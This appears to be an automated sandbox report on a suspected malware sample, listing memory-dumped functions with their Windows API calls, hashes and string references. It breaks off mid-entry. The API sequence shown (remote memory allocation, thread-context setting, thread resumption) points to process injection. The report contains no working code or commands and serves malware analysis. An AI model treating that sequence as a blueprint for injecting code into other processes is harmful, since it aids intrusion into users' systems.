Function 0306DA00 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0306DA8F

Memory Dump Source

Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e7bede00ba5bd7233f51d616f1fc3f3febcef427a117088cf2540e391878c8c6
Instruction ID: c0f6a65bb78652cf8688d06fff8020b709a9e7ce95fd6931d47f1dc2999bb663
Opcode Fuzzy Hash: e7bede00ba5bd7233f51d616f1fc3f3febcef427a117088cf2540e391878c8c6
Instruction Fuzzy Hash: B121E3B5D012499FDB10CFAAD984BEEBBF5FB08310F14841AE958A7350D378A954CF64

Function 0764A380 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0764A3FE

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9d2d75fa44592d79410326bc71a6ba112cbe75871a0cf340e4a4c66bb1521f70
Instruction ID: efe5e921e597f107bce7ec9d8054877e017f9a844aad552308954c0dc73d00c5
Opcode Fuzzy Hash: 9d2d75fa44592d79410326bc71a6ba112cbe75871a0cf340e4a4c66bb1521f70
Instruction Fuzzy Hash: CF2135B1D003099FDB14DFAAC4847EEBBF5EF88224F14842AD519A7241CB78A945CFA0

Function 0764AA40 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0764AAC0

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b85ce31d7d9d484c5195056fd8eaa8f1f77a5a3ecd983da276061b4ecd0e97f4
Instruction ID: 87bfbef9eb7834c1dc67bbc70b66335641b3772a13bdc7deb14f416a08cd97bc
Opcode Fuzzy Hash: b85ce31d7d9d484c5195056fd8eaa8f1f77a5a3ecd983da276061b4ecd0e97f4
Instruction Fuzzy Hash: C62128B1D003599FDB10DFAAC880BEEBBF5FF48310F548429E959A7240D7789945CBA0

Function 0306DA08 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0306DA8F

Memory Dump Source

Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8fd6dcabac2872331c92a7bdd3c53b3eeae0d97bd88e2cfaefafe92f8cc6fb32
Instruction ID: 64fbdec27c5598edbad3a73a9457313697ee4906426727d1be5997d5e1370a31
Opcode Fuzzy Hash: 8fd6dcabac2872331c92a7bdd3c53b3eeae0d97bd88e2cfaefafe92f8cc6fb32
Instruction Fuzzy Hash: 5921E0B59002499FDB10CFAAD884AEEBBF9EB48310F14841AE918A7250D374A940CFA4

Function 0306B999 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0306B7F9,00000800,00000000,00000000), ref: 0306BA0A

Memory Dump Source

Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 88fe2e601043b5ecc861cec6348d24ce6f13ecb706590786a82e44c4e6a5ffd4
Instruction ID: 7eb2ef8d9f98c7dd4bad55cc06c3f53fc4258423798faf3ae6b53187919f4be5
Opcode Fuzzy Hash: 88fe2e601043b5ecc861cec6348d24ce6f13ecb706590786a82e44c4e6a5ffd4
Instruction Fuzzy Hash: DB1126B6D013498FDB24DF9AC844BDEFBF5EB88310F14842AD559A7200C375A545CFA5

Function 0764A888 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0764A8FE

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 462d19cf09878cb5b0fee046de2d7fe31223b18c689e1184ab4c1c69df0fba33
Instruction ID: 90b55b0cbfb895598d6abdf1ab6b4a7e34fae874a005ed2c2e68767a309b56c1
Opcode Fuzzy Hash: 462d19cf09878cb5b0fee046de2d7fe31223b18c689e1184ab4c1c69df0fba33
Instruction Fuzzy Hash: 5C1159B18003499FDB20DFAAC8447EFBBF5EF88324F248819E559A7250C775A941CBA1

Function 0306B238 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0306B7F9,00000800,00000000,00000000), ref: 0306BA0A

Memory Dump Source

Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 63207d6a37c06af16d5212fc9f3a89cd6191403bdc79c22128add5a119091e33
Instruction ID: 041d6f8fc428295863450ca9ff7de2e9380f4884168bfa84777e3ef039d4d55f
Opcode Fuzzy Hash: 63207d6a37c06af16d5212fc9f3a89cd6191403bdc79c22128add5a119091e33
Instruction Fuzzy Hash: 5211F6B6D003499FDB24DF9AD844BDEFBF5EB48310F14842AD919A7200C375A945CFA5

Function 07649E90 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07649EFA

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c67cb55804f692a7c44bfa25e33c8c758dd00128ecf24497fd25329ef04f5276
Instruction ID: 16da31b871d7982d483ccefd5467a042ed4fce3667214c047377556d45e221ab
Opcode Fuzzy Hash: c67cb55804f692a7c44bfa25e33c8c758dd00128ecf24497fd25329ef04f5276
Instruction Fuzzy Hash: 55117CB1C003488BDB24DFAAD4457DFFBF5AF48324F248819C919A7640CB79A945CB94

Function 0764A890 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0764A8FE

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 104207b93d7f86078cff42faaa5a8c77e7147e34d5feb493a29b6efcdf23a710
Instruction ID: da9872389cf4b6d6d8588a08b88f5d729ed7035c79715dd18215e12d368afe10
Opcode Fuzzy Hash: 104207b93d7f86078cff42faaa5a8c77e7147e34d5feb493a29b6efcdf23a710
Instruction Fuzzy Hash: E6113A71D003499FDB24DFAAC8447EEBBF5EF48314F148419D515A7250C775A940CFA0

Function 07649E98 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07649EFA

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9ea7a7f7c4e47d4974a93daf04c3683590677758d012c87d35f97c07ce3c4d66
Instruction ID: f210ec81356c2dea346302f3e6a371d52212d73c2332d824f4e229763572a1a3
Opcode Fuzzy Hash: 9ea7a7f7c4e47d4974a93daf04c3683590677758d012c87d35f97c07ce3c4d66
Instruction Fuzzy Hash: D31128B1D003498FDB24DFAAC4457DEFBF5AF88324F248819D519A7240C675A945CBA4

Function 0306B718 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0306B77E

Memory Dump Source

Source File: 0000000C.00000002.1319160243.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_3060000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6ce0985daf6bc6696d283f40492ff584f8cdf296fe1141a692c4df9de9fd46af
Instruction ID: 969d67593c37ac9799eb3bf1cc20bd73c4c5d76c0ecbd46268386fddc177cae3
Opcode Fuzzy Hash: 6ce0985daf6bc6696d283f40492ff584f8cdf296fe1141a692c4df9de9fd46af
Instruction Fuzzy Hash: 1F110FB6C017498FDB20DF9AC444BDEFBF5EB88210F14842AD828A7210C379A545CFA1

Function 0764AC80 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0764DBED

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9eed12eb8a16d1495473bda19c37bf7ced761139b462ed161b8341ca3826968e
Instruction ID: 0de8c37bdd08aad12c8e5172ddca24ba7ab4a55d23117a03f457cef93447cb3d
Opcode Fuzzy Hash: 9eed12eb8a16d1495473bda19c37bf7ced761139b462ed161b8341ca3826968e
Instruction Fuzzy Hash: B31103B5D00749DFDB20DF9AD885BDEBBF8EB48310F10845AEA19A7200C375A944CFA5

Function 0764DB8B Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0764DBED

Memory Dump Source

Source File: 0000000C.00000002.1323818483.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7640000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6d83f5b4792fd46b46f46be20bb2c8fd9bda1642861c42147db268db11cfed5f
Instruction ID: 62c08ed1be1923218cd49aeadf04cca467b7747913e7b5b120ed4f456d8f7b98
Opcode Fuzzy Hash: 6d83f5b4792fd46b46f46be20bb2c8fd9bda1642861c42147db268db11cfed5f
Instruction Fuzzy Hash: 3D1103B68007499FDB20DF9AD845BDEFBF8FB48320F20841AD559A7240C375A944CFA1

Function 0300D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1317998382.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300d000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256d51e42d3608de2b658cfa95d43f7eabb3c4f8c11fcf5c83ecded6690fdd95
Instruction ID: d4a551fd1347e7808485f32c1518aa942ae9849dc5a17f4b39b7fefc5da58a5b
Opcode Fuzzy Hash: 256d51e42d3608de2b658cfa95d43f7eabb3c4f8c11fcf5c83ecded6690fdd95
Instruction Fuzzy Hash: B82128B1504204DFEB05DF54D9C0B2AFBA5FB84324F24C5A9E90A0B696C336E456CAB2

Function 0301D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1318046407.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_301d000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c569096feea3acfd00e670bb5bad6c7598040a3185f57566b2f85855d934207e
Instruction ID: fb6a492e4b0292d69407e5eaa7721150f3c73b6b71568dfac03f00cf5c64b651
Opcode Fuzzy Hash: c569096feea3acfd00e670bb5bad6c7598040a3185f57566b2f85855d934207e
Instruction Fuzzy Hash: 30214971504300EFDB05DF14D5C0B39FBA5FB94314F24CAADE8094B242C336D456CA61

Function 0301D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1318046407.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_301d000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a82287c2eb505c3e2cd714a6a1e2a073207e8e02b5e0eeec145f4c99dc6acae6
Instruction ID: d38e8e432402b1fcbb0c90e1d46e18bc8687729f5fd3401e369710d1f84e0265
Opcode Fuzzy Hash: a82287c2eb505c3e2cd714a6a1e2a073207e8e02b5e0eeec145f4c99dc6acae6
Instruction Fuzzy Hash: B2210475604344DFDB16DF14D9C0B2ABBA5FB84314F28C9ADD90A4B246C33BD867CA62

Function 0301D007 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1318046407.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_301d000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 495f2a2ea0073e4fb9c5a538c8ea519d6654104a242c59426c06e6b204728dfc
Instruction ID: fc65936ff097c46288f21e24655bec22a809f6576860103e3ab88887e0265230
Opcode Fuzzy Hash: 495f2a2ea0073e4fb9c5a538c8ea519d6654104a242c59426c06e6b204728dfc
Instruction Fuzzy Hash: DF2192755093808FCB13CF24D990715BFB1EB46214F28C5DAD8498F6A7C33A981ACB62

Function 0300D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1317998382.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300d000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction ID: a8c346642535598eb7860c23bc5f0c20c8bc82888afd142c0f3a0eceffe8c9dc
Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction Fuzzy Hash: 0D11D376504240DFDB16CF54D5C4B16FFB1FB84324F28C6AAD8490B656C33AE456CBA2

Function 0301D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1318046407.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_301d000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction ID: 562ef76c47d731fbf98905e425777e1e49d8ccc84ec5d3b3c22b76630cc15427
Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
Instruction Fuzzy Hash: F911DD75504280DFCB12CF10C5C0B25FBB1FB84314F28C6AED8494B696C33AD41ACB61

Function 0300D731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1317998382.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300d000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bb1ed62bfa79cd7a8b7d030df93d7c5f3515d8f24e6165d2992e4a0f64cac5b
Instruction ID: dd012bd98dd67028e10025bc19b55442dccb6691ba36402ca8f977cdae85c012
Opcode Fuzzy Hash: 1bb1ed62bfa79cd7a8b7d030df93d7c5f3515d8f24e6165d2992e4a0f64cac5b
Instruction Fuzzy Hash: 4D01A7715067449BF710CE65CD8476BFBD8EF81264F18C85AED0D4E1C2E6799840CA72

Function 0300D730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1317998382.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_300d000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aadec7af0bd289647e726bea1476d54031a45a54a1d39c5a51f353d0b37023c3
Instruction ID: 217ad1659a803fc93935d9861069903f717b40f69ad1f07552b17e7506a12927
Opcode Fuzzy Hash: aadec7af0bd289647e726bea1476d54031a45a54a1d39c5a51f353d0b37023c3
Instruction Fuzzy Hash: 02F0C2724053449FF7208E15CD84B67FBD8EB81234F28C45AED0C0F282D2789840CA71

Analysis Process: GhrKoSGuCdvpJ.exePID: 4268, Parent PID: 7032COMMON

Execution Graph

Execution Coverage:	17.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	33
Total number of Limit Nodes:	4

Executed Functions

Function 056B7F18 Relevance: 5.3, Strings: 4, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 056B8020
,q, xrefs: 056B8098
,q, xrefs: 056B808A
(oq, xrefs: 056B8012

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: (oq$(oq$,q$,q
API String ID: 0-620556200
Opcode ID: 25156ef9f6ec5107a9872a962ed830b2bc9b7cbad160f89a1d2eb1a9e953db23
Instruction ID: b0df49f8d9680cf9cc6877549ddd8d21fca3e1429623ecb9f17aaad1d94f583b
Opcode Fuzzy Hash: 25156ef9f6ec5107a9872a962ed830b2bc9b7cbad160f89a1d2eb1a9e953db23
Instruction Fuzzy Hash: 2FD1F970A04219DFEF14CFA9C884AEDBBBABF89340F158165E815AB761D770DD81CB50

Function 056B29EC Relevance: 5.3, Strings: 4, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xq, xrefs: 056B2A9E
Xq, xrefs: 056B2B57
Xq, xrefs: 056B2AD8
Xq, xrefs: 056B2BA4

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: Xq$Xq$Xq$Xq
API String ID: 0-3965792415
Opcode ID: 2d5ec1ee5696337f707f2824021e2cea9c27fb93ba043f59fa9a2866b1c1c1e4
Instruction ID: c0ca4bc53de1d2952a491cce28ea3b2ddcaf73929ba14800e8f1b84f877507e2
Opcode Fuzzy Hash: 2d5ec1ee5696337f707f2824021e2cea9c27fb93ba043f59fa9a2866b1c1c1e4
Instruction Fuzzy Hash: EDD1A13175430E8BEB16CF38D692B99FFB5BB94300F54686AD0059B3A1DA70D6C1CB52

Function 056BAA78 Relevance: 3.4, Strings: 2, Instructions: 898COMMON

Download Yara Rule

Strings

(oq, xrefs: 056BAF08
4'q, xrefs: 056BB503

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: (oq$4'q
API String ID: 0-1336004174
Opcode ID: e30e1efde93ff04da0b55b1415467c2668e37000911f513a23481a3ec9212a8c
Instruction ID: d099bfcbe4b8f963edc9d3d88029d86731d3ce9e00f06c745723d27b159345b7
Opcode Fuzzy Hash: e30e1efde93ff04da0b55b1415467c2668e37000911f513a23481a3ec9212a8c
Instruction Fuzzy Hash: 6E827B71A00209DFDB15CFA8C984AEEBBF6FF48300F158599E8069B365D7B0E981CB55

Function 056B77A0 Relevance: 3.0, Strings: 2, Instructions: 515
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 056B7CDA
Hq, xrefs: 056B7BA6

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: (oq$Hq
API String ID: 0-2917151738
Opcode ID: 1bde667ac8acaa622c055774f18d398c1118b5a89b62a179c438604383024efe
Instruction ID: cb68504b5a77bf7f444b62344670dbbc4190c879972c2a97666b8e9d79380c04
Opcode Fuzzy Hash: 1bde667ac8acaa622c055774f18d398c1118b5a89b62a179c438604383024efe
Instruction Fuzzy Hash: 72126D70A002198FEB14DF69D854BAEBBB6FFC8300F148569E5069B395DB74DD82CB90

Function 056B3E09 Relevance: 2.9, Strings: 2, Instructions: 422
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 056B3E2E
Xq, xrefs: 056B3E47

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: Xq$$q
API String ID: 0-855381642
Opcode ID: eedca96ea460efeef96cc1538fa7c0b7dbd983532af37641d08debd6d25c2e6c
Instruction ID: 1f9c1f94a925e7baac413d0f2982cd2b080f039aceda849dd59069852c93b89d
Opcode Fuzzy Hash: eedca96ea460efeef96cc1538fa7c0b7dbd983532af37641d08debd6d25c2e6c
Instruction Fuzzy Hash: 1AF16A74F04208DFEB18DFB9D8546AEBBB3BF88301B149529E406AB355CF359842CB51

Function 056BC5C0 Relevance: 2.8, Strings: 2, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 056BC9F0
PHq, xrefs: 056BC9DF

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 65f0e52aa7513bbfe16b8aca2c50cadd8a925ed696c8620061c29521919dc50f
Instruction ID: e9ae44cdfe9f0a9cdaf0230a0788c82272ecb7759c4f4369d3c7a1bcdddcf148
Opcode Fuzzy Hash: 65f0e52aa7513bbfe16b8aca2c50cadd8a925ed696c8620061c29521919dc50f
Instruction Fuzzy Hash: FCE1FD74E04219CFEB14CFA9D894A9DBBB2BF49310F1580A9E859AB361DB709D81CF50

Function 056B5370 Relevance: 2.7, Strings: 2, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 056B55C8
PHq, xrefs: 056B55D9

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 0fe1e898f4cae51a735280cbcf95f5a1c93fceb095cc128396541e244e4c30db
Instruction ID: 71349611615716a334e792bc76fd0f71b2797f01fc29783afb67317baee89179
Opcode Fuzzy Hash: 0fe1e898f4cae51a735280cbcf95f5a1c93fceb095cc128396541e244e4c30db
Instruction Fuzzy Hash: 54819074E00218CFEB14CFAAD944ADDBBF2BF89301F148169E419AB365EB749985CF50

Function 056BCD28 Relevance: 2.7, Strings: 2, Instructions: 191
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 056BCF90
PHq, xrefs: 056BCF7F

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: b9d46e2d82d3e5ceaa11fb129b8ced14cb46092473ca08b9e342c3f1cf47d0f6
Instruction ID: e81bf294c776abbe9452d74070ff5353e250c9303f4bff68d72c570f93065456
Opcode Fuzzy Hash: b9d46e2d82d3e5ceaa11fb129b8ced14cb46092473ca08b9e342c3f1cf47d0f6
Instruction Fuzzy Hash: 7A81B574E00258CFEB14CFA9D854A9DBBF2BF89300F14C06AE419AB365DB745981CF50

Function 056B5968 Relevance: 2.7, Strings: 2, Instructions: 188
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHq, xrefs: 056B5BD1
PHq, xrefs: 056B5BC0

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: 0317c04ac1832a323442da8b8eb7a5a6e7dee33c444865409201c598b24885fb
Instruction ID: a7ba4dd4685a44e251b5f7d92c9aaf572099810ae6e40cd95049222a28b637cf
Opcode Fuzzy Hash: 0317c04ac1832a323442da8b8eb7a5a6e7dee33c444865409201c598b24885fb
Instruction Fuzzy Hash: 39819274E00218CFEB54DFA9D994ADDBBF2BF89300F14806AE419AB365EB745981CF50

Function 056BCFF7 Relevance: 2.7, Strings: 2, Instructions: 187COMMON

Download Yara Rule

Strings

PHq, xrefs: 056BD24F
PHq, xrefs: 056BD260

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: c781046f55ffc4827451b4ef0e451fd99ab30f8de46db124a9a138084ecb4e62
Instruction ID: b95047cd9d70c87dc81cf958e08cc94d4deebfec9091eb5f5f83c69e9afd980d
Opcode Fuzzy Hash: c781046f55ffc4827451b4ef0e451fd99ab30f8de46db124a9a138084ecb4e62
Instruction Fuzzy Hash: DA818074E002189FEB14DFAAD944B9DBBB2BF89300F14C06AE419AB365DB749981CF50

Function 056BD599 Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

PHq, xrefs: 056BD7EF
PHq, xrefs: 056BD800

Memory Dump Source

Source File: 00000014.00000002.3744024553.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_56b0000_GhrKoSGuCdvpJ.jbxd

Similarity

API ID:
String ID: PHq$PHq
API String ID: 0-1274609152
Opcode ID: f6cc0b645d40855f345b1ed5642c1bc73a5cfb07e266fe00b13055f1949fb24c
Instruction ID: 847a6cf96599e6da0a58d48e0a033ce71aa5eca1362fb54e3cec9322f766dcfd
Opcode Fuzzy Hash: f6cc0b645d40855f345b1ed5642c1bc73a5cfb07e266fe00b13055f1949fb24c
